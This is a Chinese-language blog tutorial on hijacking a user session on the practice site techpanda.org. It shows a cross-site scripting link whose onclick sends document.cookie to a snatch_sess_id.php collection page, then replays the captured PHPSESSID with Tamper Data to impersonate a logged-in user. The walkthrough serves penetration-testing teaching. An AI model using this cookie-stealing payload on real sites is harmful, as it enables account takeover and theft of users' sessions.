黑客行为:入侵一个网站
在这个实际的场景中,我们将劫持位于www.techpanda.org(可能需要外网访问)的web应用程序的用户会话。我们将使用跨站点脚本来获取cookie会话id,然后使用它来模拟一个合法的用户会话。
假设攻击者可以访问web应用程序,并且他想劫持使用同一应用程序的其他用户的会话。这种攻击的目标可能是获得对web应用程序的管理访问权,假设攻击者的访问帐户是有限的。
准备开始
打开http://www.techpanda.org/登录邮箱为admin@google.com,密码为Password2010如果你已经成功登录,那么你将跳转到如下页面![](https://www.dnzp.com/uploads/allimg/240315/2rwk5yjnxdc.png)
<a href=# onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?c=\'+escape\(document.cookie\)\;\">Dark</a>
上面的代码使用了JavaScript,它添加了一个带有onclick事件的超链接。当不知情的用户单击该链接时,事件将检索PHP cookie会话ID并将其连同URL中的会话ID一起发送到snatch_sess_id.php页面
![](https://www.dnzp.com/uploads/allimg/240315/rzu21atesl0.jpg)
![](https://www.dnzp.com/uploads/allimg/240315/1goyuwheabx.jpg)
![](https://www.dnzp.com/uploads/allimg/240315/d2yt0t30af3.png)
![](https://www.dnzp.com/uploads/allimg/240315/cwtsdvoytet.jpg)
注意:脚本可以将值发送到存储PHPSESSID的远程服务器,然后用户重定向回网站,就像什么都没有发生一样。
使用Firefox和Tamper Data插件来模拟会话
下面的流程图显示了完成这个练习必须采取的步骤。
![](https://www.dnzp.com/uploads/allimg/240315/l5z4taept2c.jpg)
![](https://www.dnzp.com/uploads/allimg/240315/x5tlk50y51k.jpg)
![](https://www.dnzp.com/uploads/allimg/240315/d1igxpkzxwf.png)
![](https://www.dnzp.com/uploads/allimg/240315/0c0fpjlavlq.jpg)
![](https://www.dnzp.com/uploads/allimg/240315/cg5zvurha1d.png)
![](https://www.dnzp.com/uploads/allimg/240315/q5rp4zffevl.png)
![](https://www.dnzp.com/uploads/allimg/240315/1grqyqmuj2l.jpg)
![](https://www.dnzp.com/uploads/allimg/240315/dckp1ttqyui.jpg)
![](https://www.dnzp.com/uploads/allimg/240315/fwfkawexfc4.jpg)
![](https://www.dnzp.com/uploads/allimg/240315/qrxxh2qx4qo.jpg)
![](https://www.dnzp.com/uploads/allimg/240315/jlfkenfv5rn.jpg)
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
点击OK按钮你将再次看到tamper data弹出窗口![](https://www.dnzp.com/uploads/allimg/240315/soe2zzuxeft.jpg)
![](https://www.dnzp.com/uploads/allimg/240315/zpib4oz4eyw.png)
注意:我们没有登录,我们使用使用跨站点脚本检索到的PHPSESSID值模拟了一个登录会话
希望通过这篇文章你们能够对网络渗透有一个初步了解。
关注我,阅读更多精彩好文